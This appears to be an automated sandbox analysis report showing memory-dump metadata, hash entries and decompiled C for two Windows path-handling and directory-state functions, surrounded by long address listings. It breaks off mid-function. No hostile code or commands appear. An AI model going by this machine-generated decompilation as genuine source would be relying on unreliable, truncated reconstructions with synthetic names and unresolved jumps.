                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0637f
                                                                                                                                    0x04c06385
                                                                                                                                    0x00000000
                                                                                                                                    0x04c06385
                                                                                                                                    0x04c05d38
                                                                                                                                    0x04c05d3b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d3b
                                                                                                                                    0x04c05d27
                                                                                                                                    0x04c05d29
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c06360
                                                                                                                                    0x00000000
                                                                                                                                    0x04c06360
                                                                                                                                    0x04c05c10
                                                                                                                                    0x04c05c10
                                                                                                                                    0x04c063da
                                                                                                                                    0x04c063e5
                                                                                                                                    0x04c063e5

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7739f111f38cbe446ffe6c7f1f19c721603e46857ed02140671a8f482f5aefb4
                                                                                                                                    • Instruction ID: 300415dd94800b9c0439a6795423950e4c19429c50c8e9c3bb4dbd65ea47b70d
                                                                                                                                    • Opcode Fuzzy Hash: 7739f111f38cbe446ffe6c7f1f19c721603e46857ed02140671a8f482f5aefb4
                                                                                                                                    • Instruction Fuzzy Hash: 9C425E75A00219CFDB24CF68C880BA9B7B2FF45304F15C1AAD95DEB281D774AA95CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B54120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E04B54120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4c2d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04B6F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04B56E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04B54620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04B56E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04B545F8))) {
												case 0:
													_v568 = 0x4b11078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4b111c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04B54620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04B7F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04B7F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04B352A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04B4EB70(1, 0x4c279a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04B4AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04B795D0();
																			L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04B7B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04B73D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04B7B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                    0x04b54128
                                                                                                                                    0x04b54135
                                                                                                                                    0x04b5413c
                                                                                                                                    0x04b54141
                                                                                                                                    0x04b54145
                                                                                                                                    0x04b54147
                                                                                                                                    0x04b5414e
                                                                                                                                    0x04b54151
                                                                                                                                    0x04b54159
                                                                                                                                    0x04b5415c
                                                                                                                                    0x04b54160
                                                                                                                                    0x04b54164
                                                                                                                                    0x04b54168
                                                                                                                                    0x04b5416c
                                                                                                                                    0x04b5417f
                                                                                                                                    0x04b54181
                                                                                                                                    0x04b5446a
                                                                                                                                    0x04b5446a
                                                                                                                                    0x04b5418c
                                                                                                                                    0x04b54195
                                                                                                                                    0x04b54199
                                                                                                                                    0x04b54432
                                                                                                                                    0x04b54439
                                                                                                                                    0x04b5443d
                                                                                                                                    0x04b54442
                                                                                                                                    0x04b54447
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5419f
                                                                                                                                    0x04b541a3
                                                                                                                                    0x04b541b1
                                                                                                                                    0x04b541b9
                                                                                                                                    0x04b541bd
                                                                                                                                    0x04b545db
                                                                                                                                    0x04b545db
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541c3
                                                                                                                                    0x04b541c3
                                                                                                                                    0x04b541ce
                                                                                                                                    0x04b541d4
                                                                                                                                    0x04b9e138
                                                                                                                                    0x04b9e13e
                                                                                                                                    0x04b9e169
                                                                                                                                    0x04b9e16d
                                                                                                                                    0x04b9e19e
                                                                                                                                    0x04b9e16f
                                                                                                                                    0x04b9e16f
                                                                                                                                    0x04b9e175
                                                                                                                                    0x04b9e179
                                                                                                                                    0x04b9e18f
                                                                                                                                    0x04b9e193
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e199
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e199
                                                                                                                                    0x04b9e193
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541da
                                                                                                                                    0x04b541da
                                                                                                                                    0x04b541df
                                                                                                                                    0x04b541e4
                                                                                                                                    0x04b541ec
                                                                                                                                    0x04b54203
                                                                                                                                    0x04b54207
                                                                                                                                    0x04b9e1fd
                                                                                                                                    0x04b54222
                                                                                                                                    0x04b54226
                                                                                                                                    0x04b9e1f3
                                                                                                                                    0x04b9e1f3
                                                                                                                                    0x04b5422c
                                                                                                                                    0x04b5422c
                                                                                                                                    0x04b54233
                                                                                                                                    0x04b9e1ed
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54233
                                                                                                                                    0x04b54226
                                                                                                                                    0x04b541ee
                                                                                                                                    0x04b541ee
                                                                                                                                    0x04b541f4
                                                                                                                                    0x04b54575
                                                                                                                                    0x04b9e1b1
                                                                                                                                    0x04b9e1b1
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5457b
                                                                                                                                    0x04b5457b
                                                                                                                                    0x04b54582
                                                                                                                                    0x04b9e1ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54588
                                                                                                                                    0x04b54588
                                                                                                                                    0x04b5458c
                                                                                                                                    0x04b9e1c4
                                                                                                                                    0x04b9e1c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54592
                                                                                                                                    0x04b54592
                                                                                                                                    0x04b54599
                                                                                                                                    0x04b9e1be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5459f
                                                                                                                                    0x04b5459f
                                                                                                                                    0x04b545a3
                                                                                                                                    0x04b9e1d7
                                                                                                                                    0x04b9e1e4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545a9
                                                                                                                                    0x04b545a9
                                                                                                                                    0x04b545b0
                                                                                                                                    0x04b9e1d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b6
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b0
                                                                                                                                    0x04b545a3
                                                                                                                                    0x04b54599
                                                                                                                                    0x04b5458c
                                                                                                                                    0x04b54582
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541f4
                                                                                                                                    0x04b5423e
                                                                                                                                    0x04b54241
                                                                                                                                    0x04b545c0
                                                                                                                                    0x04b545c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545ca
                                                                                                                                    0x04b545ca
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e207
                                                                                                                                    0x04b9e20f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545ca
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54251
                                                                                                                                    0x04b54251
                                                                                                                                    0x04b54257
                                                                                                                                    0x04b5425f
                                                                                                                                    0x04b5426e
                                                                                                                                    0x04b54270
                                                                                                                                    0x04b5427a
                                                                                                                                    0x04b9e219
                                                                                                                                    0x04b9e219
                                                                                                                                    0x04b54280
                                                                                                                                    0x04b54282
                                                                                                                                    0x04b54456
                                                                                                                                    0x04b545ea
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545f0
                                                                                                                                    0x04b9e223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e223
                                                                                                                                    0x04b5445c
                                                                                                                                    0x04b5445c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5445c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54288
                                                                                                                                    0x04b5428c
                                                                                                                                    0x04b9e298
                                                                                                                                    0x04b54292
                                                                                                                                    0x04b54292
                                                                                                                                    0x04b5429e
                                                                                                                                    0x04b542a3
                                                                                                                                    0x04b542a7
                                                                                                                                    0x04b542ac
                                                                                                                                    0x04b9e22d
                                                                                                                                    0x04b542b2
                                                                                                                                    0x04b542b2
                                                                                                                                    0x04b542b9
                                                                                                                                    0x04b542bc
                                                                                                                                    0x04b542c2
                                                                                                                                    0x04b542ca
                                                                                                                                    0x04b542cd
                                                                                                                                    0x04b542cd
                                                                                                                                    0x04b542d4
                                                                                                                                    0x04b5433f
                                                                                                                                    0x04b5433f
                                                                                                                                    0x04b542d6
                                                                                                                                    0x04b542d6
                                                                                                                                    0x04b542d9
                                                                                                                                    0x04b542dd
                                                                                                                                    0x04b542eb
                                                                                                                                    0x04b9e23a
                                                                                                                                    0x04b542f1
                                                                                                                                    0x04b54305
                                                                                                                                    0x04b5430d
                                                                                                                                    0x04b54315
                                                                                                                                    0x04b54318
                                                                                                                                    0x04b5431f
                                                                                                                                    0x04b54322
                                                                                                                                    0x04b5432e
                                                                                                                                    0x04b5433b
                                                                                                                                    0x04b5433b
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5432e
                                                                                                                                    0x04b542eb
                                                                                                                                    0x04b5434c
                                                                                                                                    0x04b5434e
                                                                                                                                    0x04b54352
                                                                                                                                    0x04b54359
                                                                                                                                    0x04b5435e
                                                                                                                                    0x04b54361
                                                                                                                                    0x04b5436e
                                                                                                                                    0x04b5438a
                                                                                                                                    0x04b5438e
                                                                                                                                    0x04b54396
                                                                                                                                    0x04b5439e
                                                                                                                                    0x04b543a1
                                                                                                                                    0x04b543ad
                                                                                                                                    0x04b543bb
                                                                                                                                    0x04b543bb
                                                                                                                                    0x04b543ad
                                                                                                                                    0x04b5436e
                                                                                                                                    0x04b543bf
                                                                                                                                    0x04b543c5
                                                                                                                                    0x04b54463
                                                                                                                                    0x04b54463
                                                                                                                                    0x04b543ce
                                                                                                                                    0x04b543d5
                                                                                                                                    0x04b543d9
                                                                                                                                    0x04b543df
                                                                                                                                    0x04b54475
                                                                                                                                    0x04b54479
                                                                                                                                    0x04b54491
                                                                                                                                    0x04b54491
                                                                                                                                    0x04b54479
                                                                                                                                    0x04b543e5
                                                                                                                                    0x04b543eb
                                                                                                                                    0x04b543f4
                                                                                                                                    0x04b543f6
                                                                                                                                    0x04b543f9
                                                                                                                                    0x04b543fc
                                                                                                                                    0x04b543ff
                                                                                                                                    0x04b544e8
                                                                                                                                    0x04b544ed
                                                                                                                                    0x04b544f3
                                                                                                                                    0x04b9e247
                                                                                                                                    0x00000000
                                                                                                                                    0x04b544f9
                                                                                                                                    0x04b54504
                                                                                                                                    0x04b54508
                                                                                                                                    0x04b5450f
                                                                                                                                    0x04b9e269
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54515
                                                                                                                                    0x04b54519
                                                                                                                                    0x04b54531
                                                                                                                                    0x04b54534
                                                                                                                                    0x04b54537
                                                                                                                                    0x04b5453e
                                                                                                                                    0x04b54541
                                                                                                                                    0x04b5454a
                                                                                                                                    0x04b9e255
                                                                                                                                    0x04b9e255
                                                                                                                                    0x04b9e25b
                                                                                                                                    0x04b9e25e
                                                                                                                                    0x04b9e261
                                                                                                                                    0x04b9e261
                                                                                                                                    0x04b54555
                                                                                                                                    0x04b54559
                                                                                                                                    0x04b5455d
                                                                                                                                    0x04b9e26d
                                                                                                                                    0x04b9e270
                                                                                                                                    0x04b9e274
                                                                                                                                    0x04b9e27a
                                                                                                                                    0x04b9e27d
                                                                                                                                    0x04b9e28e
                                                                                                                                    0x04b9e28e
                                                                                                                                    0x04b54563
                                                                                                                                    0x04b54563
                                                                                                                                    0x04b54569
                                                                                                                                    0x04b54569
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5455d
                                                                                                                                    0x04b5450f
                                                                                                                                    0x00000000
                                                                                                                                    0x04b544f3
                                                                                                                                    0x04b543ff
                                                                                                                                    0x04b54405
                                                                                                                                    0x04b54405
                                                                                                                                    0x04b54405
                                                                                                                                    0x04b542ac
                                                                                                                                    0x04b5428c
                                                                                                                                    0x04b54282
                                                                                                                                    0x04b54407
                                                                                                                                    0x04b5440d
                                                                                                                                    0x04b9e2af
                                                                                                                                    0x04b9e2af
                                                                                                                                    0x04b54413
                                                                                                                                    0x04b54413
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541d4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541c3
                                                                                                                                    0x04b541bd
                                                                                                                                    0x04b54415
                                                                                                                                    0x04b54415
                                                                                                                                    0x04b54416
                                                                                                                                    0x04b54417
                                                                                                                                    0x04b54429
                                                                                                                                    0x04b5416e
                                                                                                                                    0x04b5416e
                                                                                                                                    0x04b54175
                                                                                                                                    0x04b54498
                                                                                                                                    0x04b5449f
                                                                                                                                    0x04b9e12d
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e133
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e133
                                                                                                                                    0x04b544a5
                                                                                                                                    0x04b544a5
                                                                                                                                    0x04b544aa
                                                                                                                                    0x00000000
                                                                                                                                    0x04b544bb
                                                                                                                                    0x04b544ca
                                                                                                                                    0x04b544d6
                                                                                                                                    0x04b544d7
                                                                                                                                    0x04b544d8
                                                                                                                                    0x04b544e3
                                                                                                                                    0x04b544e3
                                                                                                                                    0x04b544aa
                                                                                                                                    0x04b5417b
                                                                                                                                    0x04b5417b
                                                                                                                                    0x04b5417b
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5417b
                                                                                                                                    0x04b54175
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a7fac64c8bb541226cbadb3f0acb0ae4efdfdab8476f60304e7f67d9dc4831f9
                                                                                                                                    • Instruction ID: 025b94197c9989b44b37238b82c7f9186bdeb1a5805a9a4445b82b3700efdc67
                                                                                                                                    • Opcode Fuzzy Hash: a7fac64c8bb541226cbadb3f0acb0ae4efdfdab8476f60304e7f67d9dc4831f9
                                                                                                                                    • Instruction Fuzzy Hash: 97F16F706082518BDB14CF19C480B3AF7E1FF88758F1449AEF886CB2A0E735E995DB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B352A5, Relevance: .2, Instructions: 161COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E04B352A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04B4EEF0(0x4c279a0);
					_t104 =  *0x4c28210; // 0x932bc8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04B4EB70(_t93, 0x4c279a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04B79890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04B4EEF0(0x4c279a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04B4EB70(0, 0x4c279a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x932bd5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04B6F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04B4EEF0(0x4c279a0);
									__eflags =  *0x4c28210 - _t104; // 0x932bc8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4c28210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04BB4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04B4EB70(_t95, 0x4c279a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04B795D0();
											L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04B795D0();
											L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04B4EB70(_t93, 0x4c279a0);
